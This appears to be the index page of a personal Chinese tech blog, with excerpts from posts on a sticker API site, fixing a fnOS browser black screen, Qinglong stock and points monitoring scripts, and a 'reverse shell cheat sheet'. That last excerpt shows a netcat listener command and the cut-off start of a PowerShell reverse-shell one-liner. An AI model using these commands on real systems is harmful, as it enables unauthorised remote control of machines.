background picture of the home page

Eunie,ユーニ,优妮

哈基米(耄耋)随机API表情站

前提 趁.de域名打折,注册哈基米德域名,遂用来建个哈基米表情站 访问地址 :www.hajimi.de 费用以及架构 前端使用vercel部署,100G流量/月,0成本 后端使用render部署,uptimerobot.com保活,100G流量/月,0成本

thumbnail of the cover of the post

飞牛OS浏览器打开黑屏的解决方法

情况 如果将飞牛的用户添加到Docker组之后会导致应用中心的浏览器套件(v1.2.3)安装完成存在黑屏问题。 具体现象如下: 解决方法 打开飞牛OS的Docker,停止chromiun容器,编辑环境变量,修改容器设置的PUID和PGID为1000

thumbnail of the cover of the post

反向Shell备忘录

控制端打开端口并监听 nc -nvlp 8888 被控端执行以下命令(仅记录部分常用命令) powershell: powershell -c "$client = New-Object System.Net.Sockets.T

thumbnail of the cover of the post

【青龙脚本】Akile库存监控脚本

代码中只监控了香港和日本低价服务器,如果要监控其他的自行修改 const puppeteer = require('puppeteer'); const notify = require('./sendNotify.js'); let axios = require('axios'); cons

thumbnail of the cover of the post

【青龙脚本】P5X公众号积分监控脚本

需要自行去青龙面板添加环境变量P5X,如果不需要推送自行修改,环境变量内容是完美账号Cookie 自行修改代码中的itemid和uid,itemid需要抓包获取 const notify = require('./sendNotify.js'); let axios = require('axios

thumbnail of the cover of the post